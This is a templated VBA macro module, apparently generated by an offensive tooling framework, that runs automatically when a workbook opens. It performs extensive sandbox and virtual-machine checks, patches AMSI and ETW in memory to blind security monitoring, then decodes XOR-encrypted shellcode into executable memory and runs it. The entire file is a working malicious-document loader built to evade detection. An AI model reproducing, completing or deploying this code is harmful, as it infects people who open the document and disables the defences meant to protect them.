Attribute VB_Name = "{{ v.module_name }}"
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function {{ v.fn_callwp }} Lib "user32" Alias "CallWindowProcA" _
        (ByVal lpPrevWndFunc As LongPtr, ByVal hWnd As LongPtr, _
         ByVal Msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function {{ v.fn_loadlib }} Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
    Private Declare PtrSafe Function {{ v.fn_getprocaddr }} Lib "kernel32" Alias "GetProcAddress" _
        (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
#End If

Private {{ v.fn_valloc }} As LongPtr
Private {{ v.fn_movemem }} As LongPtr
Private {{ v.fn_vprotect }} As LongPtr

Private Function {{ v.fn_build_str }}(codes() As Integer) As String
    Dim s As String, i As Long
    For i = 0 To UBound(codes)
        s = s & Chr(codes(i))
    Next
    {{ v.fn_build_str }} = s
End Function

Private Sub {{ v.fn_amsi_patch }}()
    On Error Resume Next
    Dim amsiLib As String: amsiLib = {{ v.vba_amsi_dll }}
    Dim scanName As String: scanName = {{ v.vba_amsi_scan_buf }}
    Dim amsiBase As LongPtr: amsiBase = {{ v.fn_loadlib }}(amsiLib)
    If amsiBase = 0 Then Exit Sub
    Dim scanAddr As LongPtr: scanAddr = {{ v.fn_getprocaddr }}(amsiBase, scanName)
    If scanAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, &H40, VarPtr(oldP)
    Dim {{ v.var_amsi_patch }}(0 To 5) As Byte
    {{ v.var_amsi_patch }}(0) = &H{{ amsi_enc_bytes[0] }}: {{ v.var_amsi_patch }}(1) = &H{{ amsi_enc_bytes[1] }}: {{ v.var_amsi_patch }}(2) = &H{{ amsi_enc_bytes[2] }}: {{ v.var_amsi_patch }}(3) = &H{{ amsi_enc_bytes[3] }}: {{ v.var_amsi_patch }}(4) = &H{{ amsi_enc_bytes[4] }}: {{ v.var_amsi_patch }}(5) = &H{{ amsi_enc_bytes[5] }}
    Dim {{ v.var_amsi_xk }} As Byte: {{ v.var_amsi_xk }} = &H{{ amsi_xor_key }}
    Dim {{ v.var_amsi_pi }} As Long: For {{ v.var_amsi_pi }} = 0 To 5: {{ v.var_amsi_patch }}({{ v.var_amsi_pi }}) = {{ v.var_amsi_patch }}({{ v.var_amsi_pi }}) Xor {{ v.var_amsi_xk }}: Next
    {{ v.fn_callwp }} {{ v.fn_movemem }}, scanAddr, VarPtr({{ v.var_amsi_patch }}(0)), 6, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, oldP, VarPtr(oldP)
End Sub

Private Sub {{ v.fn_etw_patch }}()
    On Error Resume Next
    Dim ntdllName As String: ntdllName = {{ v.vba_ntdll_dll }}
    Dim etwName As String: etwName = {{ v.vba_etw_event_write }}
    Dim ntdllBase As LongPtr: ntdllBase = {{ v.fn_loadlib }}(ntdllName)
    If ntdllBase = 0 Then Exit Sub
    Dim etwAddr As LongPtr: etwAddr = {{ v.fn_getprocaddr }}(ntdllBase, etwName)
    If etwAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, &H40, VarPtr(oldP)
    Dim {{ v.var_etw_patch }}(0 To 3) As Byte
    {{ v.var_etw_patch }}(0) = &H{{ etw_enc_bytes[0] }}: {{ v.var_etw_patch }}(1) = &H{{ etw_enc_bytes[1] }}: {{ v.var_etw_patch }}(2) = &H{{ etw_enc_bytes[2] }}: {{ v.var_etw_patch }}(3) = &H{{ etw_enc_bytes[3] }}
    Dim {{ v.var_etw_xk }} As Byte: {{ v.var_etw_xk }} = &H{{ etw_xor_key }}
    Dim {{ v.var_etw_pi }} As Long: For {{ v.var_etw_pi }} = 0 To 3: {{ v.var_etw_patch }}({{ v.var_etw_pi }}) = {{ v.var_etw_patch }}({{ v.var_etw_pi }}) Xor {{ v.var_etw_xk }}: Next
    {{ v.fn_callwp }} {{ v.fn_movemem }}, etwAddr, VarPtr({{ v.var_etw_patch }}(0)), 4, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, oldP, VarPtr(oldP)
End Sub

Private Function {{ v.fn_hex2arr }}(hex As String) As Byte()
    Dim n As Long: n = Len(hex) \ 2
    Dim arr() As Byte: ReDim arr(0 To n - 1)
    Dim i As Long
    For i = 0 To n - 1
        arr(i) = CByte("&H" & Mid$(hex, i * 2 + 1, 2))
    Next
    {{ v.fn_hex2arr }} = arr
End Function

Private Function {{ v.fn_xor }}(data() As Byte, key() As Byte) As Byte()
    Dim n As Long: n = UBound(data)
    Dim k As Long: k = UBound(key) + 1
    Dim out() As Byte: ReDim out(0 To n)
    Dim i As Long
    For i = 0 To n
        out(i) = data(i) Xor key(i Mod k)
    Next
    {{ v.fn_xor }} = out
End Function

Private Function {{ v.fn_sandbox }}() As Boolean
    {{ v.fn_sandbox }} = False
    On Error Resume Next
    If Application.Workbooks.Count < 1 Then {{ v.fn_sandbox }} = True: Exit Function
    If Application.RecentFiles.Count < 3 Then {{ v.fn_sandbox }} = True: Exit Function
    Dim {{ v.vba_lv_usr }} As String: {{ v.vba_lv_usr }} = LCase(Environ("USERNAME"))
    Dim {{ v.vba_lv_badu }}: {{ v.vba_lv_badu }} = Split({{ v.vba_bad_users }}, Chr(124))
    Dim {{ v.vba_lv_lcnt }} As Integer
    For {{ v.vba_lv_lcnt }} = 0 To UBound({{ v.vba_lv_badu }})
        If {{ v.vba_lv_usr }} = CStr({{ v.vba_lv_badu }}({{ v.vba_lv_lcnt }})) Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    Dim {{ v.vba_lv_cname }} As String: {{ v.vba_lv_cname }} = LCase(Environ("COMPUTERNAME"))
    Dim {{ v.vba_lv_badc }}: {{ v.vba_lv_badc }} = Split({{ v.vba_bad_computers }}, Chr(124))
    For {{ v.vba_lv_lcnt }} = 0 To UBound({{ v.vba_lv_badc }})
        If InStr({{ v.vba_lv_cname }}, CStr({{ v.vba_lv_badc }}({{ v.vba_lv_lcnt }}))) > 0 Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    On Error Resume Next
    Dim {{ v.vba_lv_xi }} As Integer
    Dim {{ v.vba_lv_vmcodes }}({{ vba_vmware_reg_len }}) As Integer
    {% for b in vba_vmware_reg_enc %}{{ v.vba_lv_vmcodes }}({{ loop.index0 }})={{ b }}
    {% endfor %}For {{ v.vba_lv_xi }} = 0 To {{ vba_vmware_reg_len }}: {{ v.vba_lv_vmcodes }}({{ v.vba_lv_xi }}) = {{ v.vba_lv_vmcodes }}({{ v.vba_lv_xi }}) Xor {{ vba_vmware_reg_xk }}: Next
    Dim {{ v.vba_lv_shell }} As Object
    Set {{ v.vba_lv_shell }} = CreateObject({{ v.vba_wscript_shell }})
    {{ v.vba_lv_shell }}.RegRead {{ v.fn_build_str }}({{ v.vba_lv_vmcodes }})
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set {{ v.vba_lv_shell }} = Nothing: Exit Function
    Err.Clear
    Dim {{ v.vba_lv_vbcodes }}({{ vba_vbox_reg_len }}) As Integer
    {% for b in vba_vbox_reg_enc %}{{ v.vba_lv_vbcodes }}({{ loop.index0 }})={{ b }}
    {% endfor %}For {{ v.vba_lv_xi }} = 0 To {{ vba_vbox_reg_len }}: {{ v.vba_lv_vbcodes }}({{ v.vba_lv_xi }}) = {{ v.vba_lv_vbcodes }}({{ v.vba_lv_xi }}) Xor {{ vba_vbox_reg_xk }}: Next
    {{ v.vba_lv_shell }}.RegRead {{ v.fn_build_str }}({{ v.vba_lv_vbcodes }})
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set {{ v.vba_lv_shell }} = Nothing: Exit Function
    Err.Clear
    Set {{ v.vba_lv_shell }} = Nothing
    Dim {{ v.vba_lv_fso }} As Object
    Set {{ v.vba_lv_fso }} = CreateObject({{ v.vba_fs_obj }})
    On Error Resume Next
    Dim {{ v.vba_lv_drv }} As Object
    Set {{ v.vba_lv_drv }} = {{ v.vba_lv_fso }}.GetDrive("C:")
    If Err.Number = 0 Then
        If {{ v.vba_lv_drv }}.TotalSize < 53687091200 Then {{ v.fn_sandbox }} = True: Set {{ v.vba_lv_fso }} = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set {{ v.vba_lv_fso }} = Nothing
    Dim {{ v.vba_lv_wmisvc }} As Object
    On Error Resume Next
    Set {{ v.vba_lv_wmisvc }} = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim {{ v.vba_lv_prtq }} As Object: Set {{ v.vba_lv_prtq }} = {{ v.vba_lv_wmisvc }}.ExecQuery({{ v.vba_wmi_printer_q }})
        Dim {{ v.vba_lv_prtcnt }} As Long: {{ v.vba_lv_prtcnt }} = 0
        Dim {{ v.vba_lv_oprt }} As Object
        For Each {{ v.vba_lv_oprt }} In {{ v.vba_lv_prtq }}: {{ v.vba_lv_prtcnt }} = {{ v.vba_lv_prtcnt }} + 1: Next
        If {{ v.vba_lv_prtcnt }} = 0 Then {{ v.fn_sandbox }} = True: Set {{ v.vba_lv_wmisvc }} = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set {{ v.vba_lv_wmisvc }} = Nothing
    Dim {{ v.vba_lv_wmiproc }} As Object
    On Error Resume Next
    Set {{ v.vba_lv_wmiproc }} = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim {{ v.vba_lv_pq }} As Object: Set {{ v.vba_lv_pq }} = {{ v.vba_lv_wmiproc }}.ExecQuery({{ v.vba_wmi_proc_q }})
        Dim {{ v.vba_lv_badproc }}() As String: {{ v.vba_lv_badproc }} = Split({{ v.vba_vm_procs }}, "|")
        Dim {{ v.vba_lv_op }} As Object, {{ v.vba_lv_pn }} As String, {{ v.vba_lv_jcnt }} As Integer
        For Each {{ v.vba_lv_op }} In {{ v.vba_lv_pq }}
            {{ v.vba_lv_pn }} = LCase({{ v.vba_lv_op }}.Name)
            For {{ v.vba_lv_jcnt }} = 0 To UBound({{ v.vba_lv_badproc }})
                If {{ v.vba_lv_pn }} = CStr({{ v.vba_lv_badproc }}({{ v.vba_lv_jcnt }})) Then {{ v.fn_sandbox }} = True: Set {{ v.vba_lv_wmiproc }} = Nothing: Exit Function
            Next {{ v.vba_lv_jcnt }}
        Next {{ v.vba_lv_op }}
    End If
    On Error GoTo 0
    Set {{ v.vba_lv_wmiproc }} = Nothing
    If Environ({{ v.vba_env_vbox }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
    If Environ({{ v.vba_env_sandboxie }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
End Function

Private Sub {{ v.fn_exec }}()
    If {{ v.fn_sandbox }}() Then Exit Sub
    Dim {{ v.vba_lv_k32 }} As LongPtr: {{ v.vba_lv_k32 }} = {{ v.fn_loadlib }}({{ v.vba_kernel32 }})
    {{ v.fn_valloc }}  = {{ v.fn_getprocaddr }}({{ v.vba_lv_k32 }}, {{ v.vba_virtual_alloc }})
    {{ v.fn_movemem }} = {{ v.fn_getprocaddr }}({{ v.vba_lv_k32 }}, {{ v.vba_rtl_move_mem }})
    {{ v.fn_vprotect }} = {{ v.fn_getprocaddr }}({{ v.vba_lv_k32 }}, {{ v.vba_virtual_protect }})
    If {{ v.fn_valloc }} = 0 Or {{ v.fn_movemem }} = 0 Or {{ v.fn_vprotect }} = 0 Then Exit Sub
    Dim {{ v.vba_lv_u32 }} As LongPtr: {{ v.vba_lv_u32 }} = {{ v.fn_loadlib }}({{ v.vba_user32_dll }})
    Dim {{ v.vba_lv_gcpos }} As LongPtr: {{ v.vba_lv_gcpos }} = {{ v.fn_getprocaddr }}({{ v.vba_lv_u32 }}, {{ v.vba_get_cursor_pos }})
    If {{ v.vba_lv_gcpos }} = 0 Then Exit Sub
    Dim {{ v.vba_lv_pt1 }}(1) As Long, {{ v.vba_lv_pt2 }}(1) As Long
    {{ v.fn_callwp }} {{ v.vba_lv_gcpos }}, VarPtr({{ v.vba_lv_pt1 }}(0)), 0, 0, 0
    Dim {{ v.vba_lv_tstart }} As Date: {{ v.vba_lv_tstart }} = Now
    Do While DateDiff("s", {{ v.vba_lv_tstart }}, Now) < 2: DoEvents: Loop
    {{ v.fn_callwp }} {{ v.vba_lv_gcpos }}, VarPtr({{ v.vba_lv_pt2 }}(0)), 0, 0, 0
    If {{ v.vba_lv_pt1 }}(0) = {{ v.vba_lv_pt2 }}(0) And {{ v.vba_lv_pt1 }}(1) = {{ v.vba_lv_pt2 }}(1) Then Exit Sub
    Call {{ v.fn_amsi_patch }}
    Call {{ v.fn_etw_patch }}

    Dim {{ v.vba_lv_schex }} As String, {{ v.vba_lv_keyhex }} As String
    {{ v.vba_lv_schex }}  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}
    {{ v.vba_lv_keyhex }} = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}

    Dim {{ v.vba_lv_k }}() As Byte
    {{ v.vba_lv_k }} = {{ v.fn_hex2arr }}({{ v.vba_lv_keyhex }})
    Dim {{ v.vba_lv_ki }} As Long
    For {{ v.vba_lv_ki }} = 0 To UBound({{ v.vba_lv_k }}): {{ v.vba_lv_k }}({{ v.vba_lv_ki }}) = {{ v.vba_lv_k }}({{ v.vba_lv_ki }}) Xor {{ key_tweak }}: Next

    Dim {{ v.vba_lv_raw }}() As Byte, {{ v.vba_lv_sc }}() As Byte
    {{ v.vba_lv_raw }} = {{ v.fn_hex2arr }}({{ v.vba_lv_schex }})
    {{ v.vba_lv_sc }}  = {{ v.fn_xor }}({{ v.vba_lv_raw }}, {{ v.vba_lv_k }})

    Dim {{ v.vba_lv_mem }} As LongPtr
    {{ v.vba_lv_mem }} = {{ v.fn_callwp }}({{ v.fn_valloc }}, 0, UBound({{ v.vba_lv_sc }}) + 1, &H3000, &H04)
    If {{ v.vba_lv_mem }} = 0 Then Exit Sub
    {{ v.fn_callwp }} {{ v.fn_movemem }}, {{ v.vba_lv_mem }}, VarPtr({{ v.vba_lv_sc }}(0)), UBound({{ v.vba_lv_sc }}) + 1, 0
    Dim {{ v.vba_lv_oldp }} As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, {{ v.vba_lv_mem }}, UBound({{ v.vba_lv_sc }}) + 1, &H20, VarPtr({{ v.vba_lv_oldp }})

    {{ v.fn_callwp }} {{ v.vba_lv_mem }}, 0, 0, 0, 0
End Sub

Public Sub Workbook_Open()
    Call {{ v.fn_exec }}
End Sub

Public Sub Auto_Open()
    Call {{ v.fn_exec }}
End Sub
